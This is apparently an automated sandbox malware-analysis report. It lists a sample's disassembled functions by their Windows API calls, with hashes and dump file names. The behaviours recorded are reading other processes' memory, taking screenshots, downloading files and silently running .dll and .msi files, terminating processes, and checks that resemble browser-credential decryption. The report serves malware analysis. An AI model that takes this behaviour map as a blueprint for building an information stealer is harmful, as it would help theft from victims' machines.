lstrcpy.KERNEL32(00000000,?), ref: 0246EC27
lstrcat.KERNEL32(?,00000000), ref: 0246EC33
lstrcat.KERNEL32(?,00435504), ref: 0246EC4A
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0246ECB8
lstrcpy.KERNEL32(00000000,?), ref: 0246ECE9
lstrcat.KERNEL32(?,00000000), ref: 0246ECF5
lstrcat.KERNEL32(?,00435518), ref: 0246ED0C

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
Instruction ID: 5359b6f6815c02c4f3ad8bdaecf8afec71124dd4b420aba5194d370f36d665fe
Opcode Fuzzy Hash: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
Instruction Fuzzy Hash: A361C471604354ABD324EF70DC49FEE77E6AF88700F10881EBA8997191DBB4D508CBA6

Function 00418240 Relevance: 18.2, APIs: 12, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00418263
lstrlenA.KERNEL32(00000000), ref: 0041829C
lstrcpy.KERNEL32(00000000,00000000), ref: 004182D3
lstrlenA.KERNEL32(00000000), ref: 004182F0
lstrcpy.KERNEL32(00000000,00000000), ref: 00418327
lstrlenA.KERNEL32(00000000), ref: 00418344
lstrcpy.KERNEL32(00000000,00000000), ref: 0041837B
lstrlenA.KERNEL32(00000000), ref: 00418398
lstrcpy.KERNEL32(00000000,00000000), ref: 004183C7
lstrlenA.KERNEL32(00000000), ref: 004183E1
lstrcpy.KERNEL32(00000000,00000000), ref: 00418410
strtok_s.MSVCRT ref: 0041842A

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$strtok_s
String ID:
API String ID: 2211830134-0
Opcode ID: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
Instruction ID: 84294ead90c4b52274de6bcb271b081bded899c4d10f8e28530b9caff154e1d2
Opcode Fuzzy Hash: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
Instruction Fuzzy Hash: F3516F716006139BDB149F39D948AABB7A5EF04340F10412AEC05E7384EF78E991CBE4

Function 024725E7 Relevance: 16.7, APIs: 11, Instructions: 229stringCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,00000000), ref: 024725F8
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02472633
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 02472644
memset.MSVCRT ref: 0247266C
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 024726C3
lstrlen.KERNEL32(00000000), ref: 024726D0
lstrcpy.KERNEL32(00000000,00000000), ref: 02472757
lstrlen.KERNEL32(00000000), ref: 0247275E
strlen.MSVCRT ref: 02472782
memset.MSVCRT ref: 0247280C
??_V@YAXPAX@Z.MSVCRT(024728C8), ref: 02472859

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Processlstrcpylstrlenmemset$MemoryOpenReadstrlen
String ID:
API String ID: 311138045-0
Opcode ID: 3dad72c2da892f3080a59da44b1c2af1ce4d3e6b4a562fa2674e328277ba50e0
Instruction ID: 5e57c4227ce843fef4bd1d15fa1923d01dec5ab4ac61b81decf08de99f0c396d
Opcode Fuzzy Hash: 3dad72c2da892f3080a59da44b1c2af1ce4d3e6b4a562fa2674e328277ba50e0
Instruction Fuzzy Hash: E681C170E002059BDB24CF95DC44BEEB7B6EF84304F24816EE914A7381EBB59942CF95

Function 02474427 Relevance: 16.7, APIs: 11, Instructions: 178COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 024744CB
GetDesktopWindow.USER32 ref: 024744D5
GetWindowRect.USER32(00000000,?), ref: 024744E3
SelectObject.GDI32(00000000,00000000), ref: 0247451A
GetHGlobalFromStream.COMBASE(?,?), ref: 0247459C
GlobalLock.KERNEL32(?), ref: 024745A7
GlobalSize.KERNEL32(?), ref: 024745B6

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
String ID:
API String ID: 1264946473-0
Opcode ID: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
Instruction ID: 64f34f2b08398bf90d51098bbe255c8f5c7e08dd0f0ac7b5a3faeab4f0bcfd52
Opcode Fuzzy Hash: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
Instruction Fuzzy Hash: 6D5108B1114354AFD310EF65DC88EAABBFAEB88714F00491EF99593250DB74E905CFA2

Function 0246E327 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00638B0C), ref: 0246E394
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0246E3BE
lstrcpy.KERNEL32(00000000,?), ref: 0246E3F6
lstrcat.KERNEL32(?,00000000), ref: 0246E404
lstrcat.KERNEL32(?,?), ref: 0246E41F
lstrcat.KERNEL32(?,?), ref: 0246E433
lstrcat.KERNEL32(?,00638A84), ref: 0246E447
lstrcat.KERNEL32(?,?), ref: 0246E45B
lstrcat.KERNEL32(?,00638AC8), ref: 0246E46E
lstrcpy.KERNEL32(00000000,?), ref: 0246E4A6
GetFileAttributesA.KERNEL32(00000000), ref: 0246E4AD

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$AttributesFileFolderPath
String ID:
API String ID: 4230089145-0
Opcode ID: efdba4d8b89c5cc5677c8f72ff9d71f47fb5f6e71c51ae459b2a2002eafe85b4
Instruction ID: 91ae45754ba906c822b8839e74c24fc57c6aa8a3ad5546fbdd1a2321c7c739e3
Opcode Fuzzy Hash: efdba4d8b89c5cc5677c8f72ff9d71f47fb5f6e71c51ae459b2a2002eafe85b4
Instruction Fuzzy Hash: 5C6171B590012C9BCB14DF74CD48AED77F6AF88300F1045AAE949A3251DBB4AF85DF91

Function 02456C77 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 02456CA6
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 02456CD3
StrCmpCA.SHLWAPI(?,00638C80), ref: 02456CF1
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 02456D11
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02456D2F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 02456D48
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02456D6D
InternetReadFile.WININET(00000000,?,00000400,?), ref: 02456D97
CloseHandle.KERNEL32(00000000), ref: 02456DB7
InternetCloseHandle.WININET(00000000), ref: 02456DBE
InternetCloseHandle.WININET(?), ref: 02456DC8

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
String ID:
API String ID: 2500263513-0
Opcode ID: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
Instruction ID: 6a13efe7c43717cd2cc72ac035bffaa9f35acea1423f217a83887fddc50f4009
Opcode Fuzzy Hash: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
Instruction Fuzzy Hash: BF417EB1A00229AFDB20DF65DC85FAE77AAAB44704F504459FE05E7281DF70AA448BA4

Function 02474A67 Relevance: 16.5, APIs: 11, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0043573C,?,024679A8), ref: 02474A6D
GetProcAddress.KERNEL32(00000000,00435748), ref: 02474A83
GetProcAddress.KERNEL32(00000000,00435750), ref: 02474A94
GetProcAddress.KERNEL32(00000000,0043575C), ref: 02474AA5
GetProcAddress.KERNEL32(00000000,00435768), ref: 02474AB6
GetProcAddress.KERNEL32(00000000,00435770), ref: 02474AC7
GetProcAddress.KERNEL32(00000000,0043577C), ref: 02474AD8
GetProcAddress.KERNEL32(00000000,00435784), ref: 02474AE9
GetProcAddress.KERNEL32(00000000,0043578C), ref: 02474AFA
GetProcAddress.KERNEL32(00000000,0043579C), ref: 02474B0B
GetProcAddress.KERNEL32(00000000,004357A8), ref: 02474B1C

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
Instruction ID: 7e124fd9e9bc01d70ca59cf7631ef6e7b83c87bd4fb212f9c61038722e6d1753
Opcode Fuzzy Hash: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
Instruction Fuzzy Hash: 7411A875951720EF8714AFB5AD4DA9A3ABABA0E70AB14381BF151D3160DBF84004DFE4

Function 0245BF50 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0245BF76
lstrlen.KERNEL32(00000000), ref: 0245BFA9
lstrcpy.KERNEL32(00000000,00000000), ref: 0245BFD3
lstrcat.KERNEL32(00000000,00000000), ref: 0245BFDB
lstrcpy.KERNEL32(00000000,00000000), ref: 0245C003
lstrlen.KERNEL32(0043509C), ref: 0245C07A

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 429597e02848e73d099179173949805f0ac9f6d10f8d92198f539ea29d3a57b6
Instruction ID: 278b9f2fb64be467af50d8acbb805c2b33afede52e7bbe4cb16796a5f168b3d3
Opcode Fuzzy Hash: 429597e02848e73d099179173949805f0ac9f6d10f8d92198f539ea29d3a57b6
Instruction Fuzzy Hash: 43A15D71A012258FCB25DF69C888AAEB7F2AF44309F14846BEC4997362DB75DC41CF90

Function 0246C7FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 136stringCOMMON

Download Yara Rule

APIs

Part of subcall function 024775A7: lstrlen.KERNEL32(------,02455D82), ref: 024775B2
Part of subcall function 024775A7: lstrcpy.KERNEL32(00000000), ref: 024775D6
Part of subcall function 024775A7: lstrcat.KERNEL32(?,------), ref: 024775E0

Part of subcall function 02477517: lstrcpy.KERNEL32(00000000), ref: 02477545

Part of subcall function 02477557: lstrcpy.KERNEL32(00000000), ref: 02477586
Part of subcall function 02477557: lstrcat.KERNEL32(00000000), ref: 02477592

lstrcpy.KERNEL32(00000000,?), ref: 0246C8F2
lstrcpy.KERNEL32(00000000,?), ref: 0246C91B
ShellExecuteEx.SHELL32(0000003C), ref: 0246C97B

Strings

\TC, xrefs: 0246C968
XTC, xrefs: 0246C823
(QC, xrefs: 0246C866
<, xrefs: 0246C93B
.dll, xrefs: 0246C7FC

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: (QC$.dll$<$XTC$\TC
API String ID: 3031569214-1251744519
Opcode ID: 78a51166efe7744123a507f86fef9074274627cecf28876ae91ec9f88b78fd30
Instruction ID: 256c774f6b0af2c200353e5be21ba50c558122a770f9ee9b1931677c40cd824f
Opcode Fuzzy Hash: 78a51166efe7744123a507f86fef9074274627cecf28876ae91ec9f88b78fd30
Instruction Fuzzy Hash: 44513F719102A98BCB10EF79C8C4A9DBBB2AF44309F55487FD899EB611DB349D4ACF40

Function 0246C9D5 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 127stringCOMMON

Download Yara Rule

APIs

Part of subcall function 024775A7: lstrlen.KERNEL32(------,02455D82), ref: 024775B2
Part of subcall function 024775A7: lstrcpy.KERNEL32(00000000), ref: 024775D6
Part of subcall function 024775A7: lstrcat.KERNEL32(?,------), ref: 024775E0

Part of subcall function 02477517: lstrcpy.KERNEL32(00000000), ref: 02477545

lstrcpy.KERNEL32(00000000,?), ref: 0246CA1C
lstrcpy.KERNEL32(00000000,?), ref: 0246CA45
ShellExecuteEx.SHELL32(0000003C), ref: 0246CB38

Strings

/passive, xrefs: 0246CAC0
(QC, xrefs: 0246CA9C
/i ", xrefs: 0246CA53
.msi, xrefs: 0246C9D5
<, xrefs: 0246CAF8

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteShelllstrcatlstrlen
String ID: /i "$ /passive$(QC$.msi$<
API String ID: 619169029-3696510191
Opcode ID: 33cce934c145ca00de03e06ac9b7a6d0c7286c59f82434367499e6814e11012c
Instruction ID: a79813869ffdbdf31c707c4d933ab0129656d2f3aa3c6f0e2b81253abdf1039e
Opcode Fuzzy Hash: 33cce934c145ca00de03e06ac9b7a6d0c7286c59f82434367499e6814e11012c
Instruction Fuzzy Hash: 15414971A102698BCB20EF79D888A9DBBB2AF04309F55487FD859EB611DB34DD46CF40

Function 02479504 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 02479510

Part of subcall function 02478A96: __getptd_noexit.LIBCMT ref: 02478A99
Part of subcall function 02478A96: __amsg_exit.LIBCMT ref: 02478AA6

__amsg_exit.LIBCMT ref: 02479530
__lock.LIBCMT ref: 02479540
InterlockedDecrement.KERNEL32(?), ref: 0247955D
free.MSVCRT ref: 02479570
InterlockedIncrement.KERNEL32(XuC), ref: 02479588

Strings

XuC, xrefs: 02479567
XuC, xrefs: 02479576, 0247957E, 02479587

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID: XuC$XuC
API String ID: 634100517-965221565
Opcode ID: 0f488bded4a2284775a0cad491dd4ea20a2d1d9719508126ea45b82ab1ed90ec
Instruction ID: 3cc792ceaedbe093f8db83b65bc360bd0082a2e797a1920b0f35c4969b0a78b4
Opcode Fuzzy Hash: 0f488bded4a2284775a0cad491dd4ea20a2d1d9719508126ea45b82ab1ed90ec
Instruction Fuzzy Hash: 6F01C072D06B21ABD731AF6A98047DEB7A0BF04724F45411BE83067790CB38AA41DFD9

Function 00409E40 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 182memorystringCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 00409E64
memcmp.MSVCRT(?,v10,00000003), ref: 00409EA2
memset.MSVCRT ref: 00409ECF
LocalAlloc.KERNEL32(00000040), ref: 00409F07

Part of subcall function 00427210: lstrcpy.KERNEL32(00000000,ERROR), ref: 0042722E

lstrcpy.KERNEL32(00000000,0043520C), ref: 0040A012

Strings

v20, xrefs: 00409E5E
v10, xrefs: 00409E9C
@, xrefs: 00409EE8

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpymemcmp$AllocLocalmemset
String ID: @$v10$v20
API String ID: 3420379846-278772428
Opcode ID: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
Instruction ID: 83ac3224cdaa42a2a44bfc4cbeb411fde6a44a78649a1401cb5d7513f19e7b50
Opcode Fuzzy Hash: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
Instruction Fuzzy Hash: F9519D71A002199BDB10EF65DC45B9F77A4AF04318F14407AF949BB2D2DBB8ED058BD8

Function 0246E3D0 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0246E3F6
lstrcat.KERNEL32(?,00000000), ref: 0246E404
lstrcat.KERNEL32(?,?), ref: 0246E41F
lstrcat.KERNEL32(?,?), ref: 0246E433
lstrcat.KERNEL32(?,00638A84), ref: 0246E447
lstrcat.KERNEL32(?,?), ref: 0246E45B
lstrcat.KERNEL32(?,00638AC8), ref: 0246E46E
lstrcpy.KERNEL32(00000000,?), ref: 0246E4A6
GetFileAttributesA.KERNEL32(00000000), ref: 0246E4AD

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$AttributesFile
String ID:
API String ID: 3428472996-0
Opcode ID: 55c52c1f62f8efd274b96c816be001393c03f7b4ce265de6d3a978105c0cffea
Instruction ID: df487520f32f3dad12f05a6458324ff24a49b4ec028771fbad138a7627179022
Opcode Fuzzy Hash: 55c52c1f62f8efd274b96c816be001393c03f7b4ce265de6d3a978105c0cffea
Instruction Fuzzy Hash: 004160B590012C9BCB14EF74CC48AED77B6AF48300F1489AAE94993251DBB49E85CF91

Function 0246C642 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145stringCOMMON

Download Yara Rule

APIs

Part of subcall function 024775A7: lstrlen.KERNEL32(------,02455D82), ref: 024775B2
Part of subcall function 024775A7: lstrcpy.KERNEL32(00000000), ref: 024775D6
Part of subcall function 024775A7: lstrcat.KERNEL32(?,------), ref: 024775E0

Part of subcall function 02477517: lstrcpy.KERNEL32(00000000), ref: 02477545

Part of subcall function 02477557: lstrcpy.KERNEL32(00000000), ref: 02477586
Part of subcall function 02477557: lstrcat.KERNEL32(00000000), ref: 02477592

lstrcpy.KERNEL32(00000000,?), ref: 0246C736
lstrcpy.KERNEL32(00000000,?), ref: 0246C75F
ShellExecuteEx.SHELL32(0000003C), ref: 0246C7CB

Strings

(QC, xrefs: 0246C6B0
<, xrefs: 0246C77F
(QC, xrefs: 0246C6F0
"" , xrefs: 0246C68C

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: "" $(QC$(QC$<
API String ID: 3031569214-2404812987
Opcode ID: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
Instruction ID: cd7b3baa1f4678984c58cb5427965d61f760de7394889a2c908f7ab61bc244f6
Opcode Fuzzy Hash: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
Instruction Fuzzy Hash: 40515C719006698FCB10EF79D8C899DBBB2AF44309F15487FD859AB611DB309D46CF80

Function 02472947 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 02472982
GetVolumeInformationA.KERNEL32(?,00000000,00000000,0246967D,00000000,00000000,00000000,00000000), ref: 024729B3
GetProcessHeap.KERNEL32(00000000,00000104), ref: 02472A16
RtlAllocateHeap.NTDLL(00000000), ref: 02472A1D
wsprintfA.USER32 ref: 02472A42

Strings

C, xrefs: 0247298C
:\, xrefs: 0247299C

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
String ID: :\$C
API String ID: 2572753744-3309953409
Opcode ID: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
Instruction ID: f2bc261d37d7b2b7d9f0740bf39516ec7f9a63b3eda429c2ae824957c93c32d0
Opcode Fuzzy Hash: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
Instruction Fuzzy Hash: CF317EB2D082499FCB14CFA88984AEEBFBDFB58740F00416EE515E7650E3748B408BA1

Function 02459357 Relevance: 12.2, APIs: 8, Instructions: 161networkfilestringCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 02459376
InternetOpenUrlA.WININET(00000000,004350EC,00000000,00000000,80000000,00000000), ref: 02459393
InternetCloseHandle.WININET(00000000), ref: 024593A0

Part of subcall function 02468117: memchr.MSVCRT ref: 02468156
Part of subcall function 02468117: memcmp.MSVCRT(00000000,?,?,?,00435108,00000000), ref: 02468170
Part of subcall function 02468117: memchr.MSVCRT ref: 0246818F

Part of subcall function 02458C17: std::_Xinvalid_argument.LIBCPMT ref: 02458C2D

strlen.MSVCRT ref: 024593BC
InternetReadFile.WININET(?,?,?,00000000), ref: 024593FD
InternetReadFile.WININET(00000000,?,00001000,?), ref: 0245942E
InternetCloseHandle.WININET(00000000), ref: 02459439
InternetCloseHandle.WININET(00000000), ref: 02459440

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_strlen
String ID:
API String ID: 1093921401-0
Opcode ID: 2df68befe2a48d953af9806ad3ef1aaa75e141ea7b2b3915444889022231d2c0
Instruction ID: dbf8a3327e4f5ad4efc28d295867a0c0947f8e4a4298d5f8a46e2faa3c54a795
Opcode Fuzzy Hash: 2df68befe2a48d953af9806ad3ef1aaa75e141ea7b2b3915444889022231d2c0
Instruction Fuzzy Hash: 2A51E571A00304ABDB20DFA8DC44BEEF7F9DB48714F14012AF945E3281DBB4DA458BA5

Function 024749C7 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 024749E0
Process32First.KERNEL32(00000000,00000128), ref: 024749F0
Process32Next.KERNEL32(00000000,00000128), ref: 02474A02
OpenProcess.KERNEL32(00000001,00000000,?), ref: 02474A23
TerminateProcess.KERNEL32(00000000,00000000), ref: 02474A32
CloseHandle.KERNEL32(00000000), ref: 02474A39
Process32Next.KERNEL32(00000000,00000128), ref: 02474A47
CloseHandle.KERNEL32(00000000), ref: 02474A52

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction ID: 89c7744f591fef3b62fac01f2101d4e2939aebf76fc25b2bab08546d0122e646
Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction Fuzzy Hash: 05019271A41214AFE7205B609C89FFB777DEB08751F001189F919A2291EFB089808BA4

Function 00424760 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424779
Process32First.KERNEL32(00000000,00000128), ref: 00424789
Process32Next.KERNEL32(00000000,00000128), ref: 0042479B
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004247BC
TerminateProcess.KERNEL32(00000000,00000000), ref: 004247CB
CloseHandle.KERNEL32(00000000), ref: 004247D2
Process32Next.KERNEL32(00000000,00000128), ref: 004247E0
CloseHandle.KERNEL32(00000000), ref: 004247EB

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
